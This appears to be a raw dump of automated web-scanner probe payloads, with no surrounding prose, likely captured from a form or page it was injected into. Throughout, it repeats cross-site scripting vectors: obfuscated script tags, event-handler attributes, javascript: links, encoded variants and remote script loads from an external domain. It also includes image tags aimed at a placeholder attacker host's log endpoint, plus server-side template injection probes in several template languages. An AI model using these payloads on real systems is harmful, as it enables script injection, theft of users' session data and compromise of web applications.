"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ScR<ScRiPt>IpT>l4tn(9136)</sCr<ScRiPt>IpT>

<a HrEF=jaVaScRiPT:>

555<WA15YF>MASMO[!+!]</WA15YF>

555<iframe src='data:text/html

bfg9150\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9150

555<img sRc='http://attacker-9266/log.php?

555<ScRiPt >uTvG(9132)</ScRiPt>

555<ScRiPt >xmaL(9886)</ScRiPt>

555<ifRAme sRc=9717.com></IfRamE>

555<body onload=Calb(9088)>

555<aVnxQfb<

555<WQWN2N>RP45Q[!+!]</WQWN2N>

555}body{zzz:Expre/**/SSion(NZZK(9947))}

bfgx2381\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2381

555<svg \xa0onload=xmaL(9728)

555'"()&%<zzz><ScRiPt >Xqn3(9646)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=Calb(9618)>

555<script>uTvG(9897)</script>

<%={{={@{#{${dfb}}%>

555<isindex type=image src=1 onerror=xmaL(9049)>

555<anN0GJ0 x=9552>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9814></ScRiPt>

555rW3ju <ScRiPt >NZZK(9152)</ScRiPt>

555<img src=xyz OnErRor=Calb(9755)>

555<ScR<ScRiPt>IpT>uTvG(9984)</sCr<ScRiPt>IpT>

'"()&%<zzz><ScRiPt >Xqn3(9668)</ScRiPt>

555<img/src=">" onerror=alert(9257)>

555<ScRiPt >l4tn(9112)</ScRiPt>

555

555<iframe src='data:text/html

555<img sRc='http://attacker-9921/log.php?

<th:t="${dfb}#foreach

555<svg \xa0onload=l4tn(9446)

5559748048

555<ScRiPt >uTvG(9398)</ScRiPt>

555<WOIPLN>23MNV[!+!]</WOIPLN>

555<a4e81GW<

555

%35%35%35%3C%53%63%52%69%50%74%20%3E%43%61%6C%62%289286%29%3C%2F%73%43%72%69%70%54%3E

555<body onload=xmaL(9774)>

555<ifRAme sRc=9103.com></IfRamE>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9781></ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=xmaL(9349)>

bfg6229\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6229

555<isindex type=image src=1 onerror=l4tn(9322)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<ScRiPt >uTvG(9908)</ScRiPt>

555\u003CScRiPt\Calb(9004)\u003C/sCripT\u003E

555<aXVtIrD x=9596>

555<img src=xyz OnErRor=xmaL(9984)>

bfgx10472\xc0\xbez1\xc0\xbcz2a\x90bcxhjl10472

555<iframe src='data:text/html

555

555<svg \xa0onload=uTvG(9205)

555&lt

555<img sRc='http://attacker-9116/log.php?

<%={{={@{#{${dfb}}%>

\xf6<img zzz onmouseover=Calb(91661) //\xf6>

555<img/src=">" onerror=alert(9596)>

555<body onload=l4tn(9186)>

dfb{{98991*97996}}xca

555<isindex type=image src=1 onerror=uTvG(9391)>

555'"()&%<zzz><ScRiPt >ZdqM(9980)</ScRiPt>

555<ak63XkO<

555

dfb[[${98991*97996}]]xca

<th:t="${dfb}#foreach

555<input autofocus onfocus=Calb(9084)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%78%6D%61%4C%289448%29%3C%2F%73%43%72%69%70%54%3E

555<img src=//xss.bxss.me/t/dot.gif onload=l4tn(9305)>

'"()&%<zzz><ScRiPt >ZdqM(9697)</ScRiPt>

555<iframe src='data:text/html

dfb__${98991*97996}__::.x

555<img src=xyz OnErRor=l4tn(9947)>

555

<a HrEF=http://xss.bxss.me></a>

555\u003CScRiPt\xmaL(9592)\u003C/sCripT\u003E

5559257139

555<body onload=uTvG(9106)>

555<img src=//xss.bxss.me/t/dot.gif onload=uTvG(9008)>

555<img src=xyz OnErRor=uTvG(9367)>

555<img/src=">" onerror=alert(9685)>

5559257139

555<img src=xyz OnErRor=l4tn(9947)>

555\u003CScRiPt\xmaL(9592)\u003C/sCripT\u003E

<a HrEF=http://xss.bxss.me></a>

555\u003CScRiPt\uTvG(9320)\u003C/sCripT\u003E

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

bfg3289\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3289

555<img/src=">" onerror=alert(9026)>

555&lt

<a HrEF=jaVaScRiPT:>

555&lt

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<ScRiPt >DUfq(9145)</ScRiPt>

bfgx2219\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2219

%35%35%35%3C%53%63%52%69%50%74%20%3E%6C%34%74%6E%289822%29%3C%2F%73%43%72%69%70%54%3E

\xf6<img zzz onmouseover=xmaL(99591) //\xf6>

555}body{zzz:Expre/**/SSion(Calb(9704))}

\xf6<img zzz onmouseover=uTvG(90381) //\xf6>

555

555<WQ5Z0J>I755O[!+!]</WQ5Z0J>

<%={{={@{#{${dfb}}%>

555\u003CScRiPt\l4tn(9815)\u003C/sCripT\u003E

555<input autofocus onfocus=xmaL(9373)>

555hZ02u <ScRiPt >Calb(9310)</ScRiPt>

555<input autofocus onfocus=uTvG(9817)>

dfb{{98991*97996}}xca

555<script>DUfq(9159)</script>

555

555&lt

<a HrEF=http://xss.bxss.me></a>

dfb[[${98991*97996}]]xca

555<WZT2HI>1JGN5[!+!]</WZT2HI>

<a HrEF=http://xss.bxss.me></a>

<a HrEF=jaVaScRiPT:>

\xf6<img zzz onmouseover=l4tn(96321) //\xf6>

555<ScR<ScRiPt>IpT>DUfq(9422)</sCr<ScRiPt>IpT>

<th:t="${dfb}#foreach

dfb__${98991*97996}__::.x

555<ifRAme sRc=9859.com></IfRamE>

<a HrEF=jaVaScRiPT:>

555<ScRiPt >DUfq(9891)</ScRiPt>

555<input autofocus onfocus=l4tn(9274)>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

555}body{zzz:Expre/**/SSion(xmaL(9612))}

555}body{zzz:Expre/**/SSion(uTvG(9299))}

555<aFngUyi x=9610>

555zmzPc <ScRiPt >xmaL(9239)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9670></ScRiPt>

<a HrEF=http://xss.bxss.me></a>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<WUAUE4>ZOBRN[!+!]</WUAUE4>

555<img sRc='http://attacker-9422/log.php?

555<ScRiPt >Xqn3(9866)</ScRiPt>

555UsxOT <ScRiPt >uTvG(9814)</ScRiPt>

555<WGHWK1>VBRMR[!+!]</WGHWK1>

555<ScRiPt >DUfq(9400)</ScRiPt>

<a HrEF=jaVaScRiPT:>

555

555<W26WYR>RHNHQ[!+!]</W26WYR>

555<ifRAme sRc=9471.com></IfRamE>

555<adzynhf<

555}body{zzz:Expre/**/SSion(l4tn(9946))}

555<ifRAme sRc=9179.com></IfRamE>

555<script>Xqn3(9050)</script>

555<svg \xa0onload=DUfq(9009)

dfb{{98991*97996}}xca

555r5NCa <ScRiPt >l4tn(9753)</ScRiPt>

555<aGnpN4A x=9296>

555<aNStuky x=9294>

555<ScR<ScRiPt>IpT>Xqn3(9145)</sCr<ScRiPt>IpT>

555<isindex type=image src=1 onerror=DUfq(9045)>

dfb[[${98991*97996}]]xca

555<WGA5SV>5ZHUN[!+!]</WGA5SV>

555<img sRc='http://attacker-9402/log.php?

555<img sRc='http://attacker-9103/log.php?

dfb__${98991*97996}__::.x

555<iframe src='data:text/html

555<ScRiPt >Xqn3(9418)</ScRiPt>

555<ifRAme sRc=9780.com></IfRamE>

555'"()&%<zzz><ScRiPt >PZ7G(9334)</ScRiPt>

555<ae70UkI<

555<aGcuYOb<

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

'"()&%<zzz><ScRiPt >PZ7G(9472)</ScRiPt>

555<body onload=DUfq(9443)>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9390></ScRiPt>

555<anHQ88T x=9108>

bfg1805\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl1805

555<img src=//xss.bxss.me/t/dot.gif onload=DUfq(9688)>

555<img sRc='http://attacker-9186/log.php?

5559642478

555<ScRiPt >Xqn3(9382)</ScRiPt>

bfgx2584\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2584

555<img src=xyz OnErRor=DUfq(9424)>

555<aOBeZeb<

bfg4083\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl4083

555<svg \xa0onload=Xqn3(9129)

<%={{={@{#{${dfb}}%>

555<isindex type=image src=1 onerror=Xqn3(9954)>

bfgx10103\xc0\xbez1\xc0\xbcz2a\x90bcxhjl10103

555<img/src=">" onerror=alert(9406)>

555

%35%35%35%3C%53%63%52%69%50%74%20%3E%44%55%66%71%289406%29%3C%2F%73%43%72%69%70%54%3E

<th:t="${dfb}#foreach

555<iframe src='data:text/html

<%={{={@{#{${dfb}}%>

555

555\u003CScRiPt\DUfq(9858)\u003C/sCripT\u003E

555

555<body onload=Xqn3(9001)>

<th:t="${dfb}#foreach

555&lt

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<img src=//xss.bxss.me/t/dot.gif onload=Xqn3(9598)>

dfb{{98991*97996}}xca

\xf6<img zzz onmouseover=DUfq(92961) //\xf6>

555

555<img src=xyz OnErRor=Xqn3(9215)>

dfb{{98991*97996}}xca

555<img/src=">" onerror=alert(9905)>

555<input autofocus onfocus=DUfq(9039)>

dfb{{98991*97996}}xca

dfb{98991*97996}xca

dfb[[${98991*97996}]]xca

<a HrEF=http://xss.bxss.me></a>

%35%35%35%3C%53%63%52%69%50%74%20%3E%58%71%6E%33%289367%29%3C%2F%73%43%72%69%70%54%3E

dfb__${98991*97996}__::.x

dfb${98991*97996}xca

<a HrEF=jaVaScRiPT:>

555\u003CScRiPt\Xqn3(9164)\u003C/sCripT\u003E

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555}body{zzz:Expre/**/SSion(DUfq(9113))}

dfb#{98991*97996}xca

555&lt

555<ScRiPt >ZdqM(9032)</ScRiPt>

555DNorI <ScRiPt >DUfq(9711)</ScRiPt>

dfb{#98991*97996}xca

555<WMD1FC>IS7JK[!+!]</WMD1FC>

\xf6<img zzz onmouseover=Xqn3(95871) //\xf6>

555<WTDNL8>XUO88[!+!]</WTDNL8>

dfb{@98991*97996}xca

555<ifRAme sRc=9536.com></IfRamE>

555<input autofocus onfocus=Xqn3(9083)>

555<script>ZdqM(9831)</script>

555<aTozc0O x=9858>

dfb{{=98991*97996}}xca

<a HrEF=http://xss.bxss.me></a>

555<img sRc='http://attacker-9839/log.php?

555<ScR<ScRiPt>IpT>ZdqM(9448)</sCr<ScRiPt>IpT>

dfb@(98991*97996)xca

<a HrEF=jaVaScRiPT:>

555<aesBfcc<

dfb<%=98991*97996%>xca

555<ScRiPt >ZdqM(9327)</ScRiPt>

dfb#set($x=98991*97996)${x}xca

555}body{zzz:Expre/**/SSion(Xqn3(9596))}

dfb{{"abc"|title}}xca

555'"()&%<zzz><ScRiPt >ZIXm(9460)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9558></ScRiPt>

555B9spe <ScRiPt >Xqn3(9191)</ScRiPt>

print("dfb" . 98991*97996 . "xca")

555<WVQLPI>1PCIU[!+!]</WVQLPI>

'"()&%<zzz><ScRiPt >ZIXm(9839)</ScRiPt>

555<ScRiPt >ZdqM(9414)</ScRiPt>

98991*97996*98991*97996

555<svg \xa0onload=ZdqM(9264)

555'"()&%<zzz><ScRiPt >sAQC(9527)</ScRiPt>

555<ifRAme sRc=9564.com></IfRamE>

dfb{@math key=98991 method="multiply" operand=97996/}xca

5559525573

555<isindex type=image src=1 onerror=ZdqM(9661)>

'"()&%<zzz><ScRiPt >sAQC(9908)</ScRiPt>

555<a6UTumD x=9962>

bfg6656\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6656

dfb{{{this}}}xca

555<img sRc='http://attacker-9449/log.php?

555<iframe src='data:text/html

5559055639

bfgx2399\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2399

#{98991*97996*98991*97996}

555<abSsvkZ<

555<body onload=ZdqM(9899)>

bfg9996\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9996

dfb#{xca}=123

bfgx5361\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5361

<%={{={@{#{${dfb}}%>

555<img src=//xss.bxss.me/t/dot.gif onload=ZdqM(9024)>

dfb{{'abcd'.toUpperCase()}}xca

AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

555

<%={{={@{#{${dfb}}%>

555<img src=xyz OnErRor=ZdqM(9636)>

dfb{{98991*97996}}xca

<th:t="${dfb}#foreach

555<img/src=">" onerror=alert(9638)>

555

dfb[[${98991*97996}]]xca

%35%35%35%3C%53%63%52%69%50%74%20%3E%5A%64%71%4D%289091%29%3C%2F%73%43%72%69%70%54%3E

555

<th:t="${dfb}#foreach

dfb__${98991*97996}__::.x

555

555\u003CScRiPt\ZdqM(9404)\u003C/sCripT\u003E

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555&lt

555

dfb{{98991*97996}}xca

555

555<ScRiPt >PZ7G(9803)</ScRiPt>

\xf6<img zzz onmouseover=ZdqM(99011) //\xf6>

dfb{{98991*97996}}xca

dfb[[${98991*97996}]]xca

555<WT0DXG>KGOTM[!+!]</WT0DXG>

555<input autofocus onfocus=ZdqM(9190)>

dfb[[${98991*97996}]]xca

<a HrEF=http://xss.bxss.me></a>

dfb__${98991*97996}__::.x

555<script>PZ7G(9072)</script>

<a HrEF=jaVaScRiPT:>

dfb__${98991*97996}__::.x

555<ScR<ScRiPt>IpT>PZ7G(9542)</sCr<ScRiPt>IpT>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555}body{zzz:Expre/**/SSion(ZdqM(9042))}

555<ScRiPt >PZ7G(9532)</ScRiPt>

555<ScRiPt >ZIXm(9379)</ScRiPt>

555<ScRiPt >sAQC(9336)</ScRiPt>

555k4JD0 <ScRiPt >ZdqM(9063)</ScRiPt>

555'"()&%<zzz><ScRiPt >4rBS(9615)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9149></ScRiPt>

555<WAFMZI>THKSG[!+!]</WAFMZI>

555<W5FA8A>RLAHE[!+!]</W5FA8A>

555<WNYXU8>2K4G3[!+!]</WNYXU8>

555<script>sAQC(9302)</script>

555<ScRiPt >PZ7G(9057)</ScRiPt>

555<script>ZIXm(9721)</script>

'"()&%<zzz><ScRiPt >4rBS(9895)</ScRiPt>

555<ScR<ScRiPt>IpT>sAQC(9475)</sCr<ScRiPt>IpT>

555<ifRAme sRc=9952.com></IfRamE>

555<svg \xa0onload=PZ7G(9906)

555<ScR<ScRiPt>IpT>ZIXm(9997)</sCr<ScRiPt>IpT>

5559687641

555<ScRiPt >sAQC(9318)</ScRiPt>

bfg6793\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6793

555<aV1LVGb x=9943>

bfgx3266\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3266

555<isindex type=image src=1 onerror=PZ7G(9749)>

555<ScRiPt >ZIXm(9297)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9071></ScRiPt>

555<img sRc='http://attacker-9155/log.php?

<%={{={@{#{${dfb}}%>

555<aUvssNo<

555<iframe src='data:text/html

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9052></ScRiPt>

555<ScRiPt >sAQC(9242)</ScRiPt>

555

555<body onload=PZ7G(9158)>

555'"()&%<zzz><ScRiPt >Q9ef(9455)</ScRiPt>

555<ScRiPt >ZIXm(9383)</ScRiPt>

555<svg \xa0onload=sAQC(9604)

<th:t="${dfb}#foreach

555<img src=//xss.bxss.me/t/dot.gif onload=PZ7G(9596)>

555<svg \xa0onload=ZIXm(9465)

'"()&%<zzz><ScRiPt >Q9ef(9238)</ScRiPt>

555<isindex type=image src=1 onerror=sAQC(9266)>

555

555<img src=xyz OnErRor=PZ7G(9310)>

555<isindex type=image src=1 onerror=ZIXm(9723)>

5559359130

555<img/src=">" onerror=alert(9474)>

555'"()&%<zzz><ScRiPt >TUJj(9347)</ScRiPt>

555'"()&%<zzz><ScRiPt >1S8n(9157)</ScRiPt>

555<iframe src='data:text/html

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

bfg10050\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl10050

'"()&%<zzz><ScRiPt >TUJj(9944)</ScRiPt>

555<iframe src='data:text/html

555<body onload=sAQC(9183)>

555'"()&%<zzz><ScRiPt >gI4s(9090)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%50%5A%37%47%289321%29%3C%2F%73%43%72%69%70%54%3E

'"()&%<zzz><ScRiPt >1S8n(9030)</ScRiPt>

555

bfgx6241\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6241

<%={{={@{#{${dfb}}%>

dfb{{98991*97996}}xca

555<img src=//xss.bxss.me/t/dot.gif onload=sAQC(9853)>

5559701318

555<body onload=ZIXm(9453)>

555'"()&%<zzz><ScRiPt >YKsX(9186)</ScRiPt>

'"()&%<zzz><ScRiPt >gI4s(9723)</ScRiPt>

555\u003CScRiPt\PZ7G(9546)\u003C/sCripT\u003E

5559430700

5559278268

555<img src=//xss.bxss.me/t/dot.gif onload=ZIXm(9424)>

bfg1350\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl1350

dfb[[${98991*97996}]]xca

555<img src=xyz OnErRor=sAQC(9656)>

'"()&%<zzz><ScRiPt >YKsX(9966)</ScRiPt>

555

555<img/src=">" onerror=alert(9500)>

bfg9340\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9340

555&lt

bfg4984\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl4984

555<img src=xyz OnErRor=ZIXm(9749)>

bfgx2248\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2248

dfb__${98991*97996}__::.x

5559346568

<th:t="${dfb}#foreach

\xf6<img zzz onmouseover=PZ7G(99431) //\xf6>

%35%35%35%3C%53%63%52%69%50%74%20%3E%73%41%51%43%289456%29%3C%2F%73%43%72%69%70%54%3E

bfgx4196\xc0\xbez1\xc0\xbcz2a\x90bcxhjl4196

bfgx2428\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2428

555<img/src=">" onerror=alert(9930)>

<%={{={@{#{${dfb}}%>

555<input autofocus onfocus=PZ7G(9955)>

555

bfg9975\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9975

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

bfgx6881\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6881

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<a HrEF=http://xss.bxss.me></a>

555\u003CScRiPt\sAQC(9916)\u003C/sCripT\u003E

<%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

%35%35%35%3C%53%63%52%69%50%74%20%3E%5A%49%58%6D%289978%29%3C%2F%73%43%72%69%70%54%3E

555

555\u003CScRiPt\ZIXm(9423)\u003C/sCripT\u003E

555&lt

<a HrEF=jaVaScRiPT:>

555<ScRiPt >4rBS(9619)</ScRiPt>

<th:t="${dfb}#foreach

555

555}body{zzz:Expre/**/SSion(PZ7G(9341))}

\xf6<img zzz onmouseover=sAQC(96981) //\xf6>

<%={{={@{#{${dfb}}%>

555

555

<th:t="${dfb}#foreach

dfb{{98991*97996}}xca

555Q8DF0 <ScRiPt >PZ7G(9890)</ScRiPt>

<th:t="${dfb}#foreach

555

555&lt

555<W6X5W2>KQKCX[!+!]</W6X5W2>

555

\xf6<img zzz onmouseover=ZIXm(98901) //\xf6>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<WHQNSK>QJC6M[!+!]</WHQNSK>

555<input autofocus onfocus=sAQC(9182)>

555<script>4rBS(9270)</script>

555

555<ifRAme sRc=9534.com></IfRamE>

555<input autofocus onfocus=ZIXm(9741)>

555

dfb[[${98991*97996}]]xca

<th:t="${dfb}#foreach

555

<a HrEF=http://xss.bxss.me></a>

555<ScR<ScRiPt>IpT>4rBS(9372)</sCr<ScRiPt>IpT>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

dfb{{98991*97996}}xca

555<aHWMqpS x=9325>

dfb__${98991*97996}__::.x

555<ScRiPt >4rBS(9425)</ScRiPt>

<a HrEF=jaVaScRiPT:>

555

555}body{zzz:Expre/**/SSion(sAQC(9693))}

<a HrEF=http://xss.bxss.me></a>

555

dfb[[${98991*97996}]]xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<img sRc='http://attacker-9998/log.php?

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ScRiPt >Q9ef(9918)</ScRiPt>

dfb{{98991*97996}}xca

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9967></ScRiPt>

dfb{{98991*97996}}xca

dfb[[${98991*97996}]]xca

555<WWUQSC>CCCOJ[!+!]</WWUQSC>

555tVOwQ <ScRiPt >sAQC(9204)</ScRiPt>

<a HrEF=jaVaScRiPT:>

dfb__${98991*97996}__::.x

555

555<arnwpBs<

555}body{zzz:Expre/**/SSion(ZIXm(9188))}

dfb[[${98991*97996}]]xca

555<ScRiPt >4rBS(9794)</ScRiPt>

dfb__${98991*97996}__::.x

555LY14X <ScRiPt >ZIXm(9394)</ScRiPt>

555<script>Q9ef(9101)</script>

555<WM02PT>BEYLS[!+!]</WM02PT>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb{{98991*97996}}xca

dfb__${98991*97996}__::.x

555<svg \xa0onload=4rBS(9247)

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ifRAme sRc=9594.com></IfRamE>

555'"()&%<zzz><ScRiPt >a0sH(9265)</ScRiPt>

555<WBMXQS>VKEYZ[!+!]</WBMXQS>

555<ScR<ScRiPt>IpT>Q9ef(9901)</sCr<ScRiPt>IpT>

555<ScRiPt >TUJj(9133)</ScRiPt>

dfb[[${98991*97996}]]xca

555<ScRiPt >1S8n(9277)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<isindex type=image src=1 onerror=4rBS(9218)>

555<aBoWoj6 x=9607>

555<WAG6SU>LONOY[!+!]</WAG6SU>

555<WIKLD4>5UHET[!+!]</WIKLD4>

555<ScRiPt >Q9ef(9972)</ScRiPt>

555<ifRAme sRc=9912.com></IfRamE>

555<ScRiPt >gI4s(9913)</ScRiPt>

'"()&%<zzz><ScRiPt >a0sH(9889)</ScRiPt>

dfb__${98991*97996}__::.x

555<script>TUJj(9197)</script>

555<iframe src='data:text/html

555<img sRc='http://attacker-9028/log.php?

555<script>1S8n(9576)</script>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9625></ScRiPt>

555<aUlxRFm x=9623>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<body onload=4rBS(9096)>

555<W6WGVY>AMLLH[!+!]</W6WGVY>

5559441293

555<ScRiPt >Q9ef(9619)</ScRiPt>

555<ScR<ScRiPt>IpT>TUJj(9966)</sCr<ScRiPt>IpT>

555<img src=//xss.bxss.me/t/dot.gif onload=4rBS(9315)>

555'"()&%<zzz><ScRiPt >VzOQ(9262)</ScRiPt>

555<ajTrgDK<

555<ScR<ScRiPt>IpT>1S8n(9484)</sCr<ScRiPt>IpT>

555<img sRc='http://attacker-9218/log.php?

555<ScRiPt >YKsX(9547)</ScRiPt>

555<ScRiPt >1S8n(9019)</ScRiPt>

'"()&%<zzz><ScRiPt >VzOQ(9382)</ScRiPt>

555<script>gI4s(9895)</script>

bfg10065\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl10065

555<ScRiPt >TUJj(9269)</ScRiPt>

555<svg \xa0onload=Q9ef(9197)

555<aXZ8HOE<

bfgx1544\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1544

555<img src=xyz OnErRor=4rBS(9505)>

555<W50J5W>46GE1[!+!]</W50J5W>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9158></ScRiPt>

5559019010

555<ScR<ScRiPt>IpT>gI4s(9971)</sCr<ScRiPt>IpT>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9798></ScRiPt>

555<isindex type=image src=1 onerror=Q9ef(9665)>

555<script>YKsX(9058)</script>

555<img/src=">" onerror=alert(9965)>

<%={{={@{#{${dfb}}%>

555'"()&%<zzz><ScRiPt >kpwe(9771)</ScRiPt>

555<ScR<ScRiPt>IpT>YKsX(9248)</sCr<ScRiPt>IpT>

%35%35%35%3C%53%63%52%69%50%74%20%3E%34%72%42%53%289090%29%3C%2F%73%43%72%69%70%54%3E

bfg7695\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7695

555<ScRiPt >1S8n(9804)</ScRiPt>

555<ScRiPt >gI4s(9740)</ScRiPt>

555<ScRiPt >TUJj(9464)</ScRiPt>

555<iframe src='data:text/html

555

555\u003CScRiPt\4rBS(9370)\u003C/sCripT\u003E

'"()&%<zzz><ScRiPt >kpwe(9346)</ScRiPt>

555<ScRiPt >YKsX(9630)</ScRiPt>

555<body onload=Q9ef(9753)>

555<svg \xa0onload=1S8n(9417)

5559054772

555&lt

bfgx3445\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3445

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9267></ScRiPt>

555<svg \xa0onload=TUJj(9733)

<th:t="${dfb}#foreach

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9223></ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=Q9ef(9227)>

555<isindex type=image src=1 onerror=1S8n(9921)>

555<ScRiPt >gI4s(9127)</ScRiPt>

\xf6<img zzz onmouseover=4rBS(99621) //\xf6>

555<img src=xyz OnErRor=Q9ef(9721)>

<%={{={@{#{${dfb}}%>

555<isindex type=image src=1 onerror=TUJj(9698)>

555

555<ScRiPt >YKsX(9988)</ScRiPt>

bfg5985\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5985

555

555'"()&%<zzz><ScRiPt >TBnb(9397)</ScRiPt>

555<iframe src='data:text/html

555<svg \xa0onload=gI4s(9603)

555<input autofocus onfocus=4rBS(9565)>

555<svg \xa0onload=YKsX(9163)

555<iframe src='data:text/html

555<img/src=">" onerror=alert(9921)>

<th:t="${dfb}#foreach

555'"()&%<zzz><ScRiPt >FRzf(9018)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

bfgx5922\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5922

<%={{={@{#{${dfb}}%>

'"()&%<zzz><ScRiPt >TBnb(9923)</ScRiPt>

555<body onload=1S8n(9065)>

555<isindex type=image src=1 onerror=gI4s(9733)>

<a HrEF=http://xss.bxss.me></a>

555<isindex type=image src=1 onerror=YKsX(9996)>

555<body onload=TUJj(9640)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%51%39%65%66%289413%29%3C%2F%73%43%72%69%70%54%3E

'"()&%<zzz><ScRiPt >FRzf(9501)</ScRiPt>

555

555

5559005491

<a HrEF=jaVaScRiPT:>

555<iframe src='data:text/html

dfb{{98991*97996}}xca

555

5559490299

555<img src=//xss.bxss.me/t/dot.gif onload=1S8n(9069)>

555<iframe src='data:text/html

555<img src=//xss.bxss.me/t/dot.gif onload=TUJj(9979)>

555\u003CScRiPt\Q9ef(9464)\u003C/sCripT\u003E

bfg10775\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl10775

555&lt

dfb[[${98991*97996}]]xca

555<body onload=gI4s(9558)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555}body{zzz:Expre/**/SSion(4rBS(9672))}

bfgx5958\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5958

555<body onload=YKsX(9440)>

555<img src=xyz OnErRor=1S8n(9589)>

<th:t="${dfb}#foreach

bfg4957\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl4957

555<img src=xyz OnErRor=TUJj(9806)>

555

5555tiIz <ScRiPt >4rBS(9670)</ScRiPt>

<%={{={@{#{${dfb}}%>

\xf6<img zzz onmouseover=Q9ef(94121) //\xf6>

dfb__${98991*97996}__::.x

555<img src=//xss.bxss.me/t/dot.gif onload=gI4s(9108)>

555

555<img src=//xss.bxss.me/t/dot.gif onload=YKsX(9808)>

555<img/src=">" onerror=alert(9615)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

%35%35%35%3C%53%63%52%69%50%74%20%3E%31%53%38%6E%289755%29%3C%2F%73%43%72%69%70%54%3E

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

bfgx2562\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2562

555<img/src=">" onerror=alert(9674)>

555<WITUM4>OSNGI[!+!]</WITUM4>

<%={{={@{#{${dfb}}%>

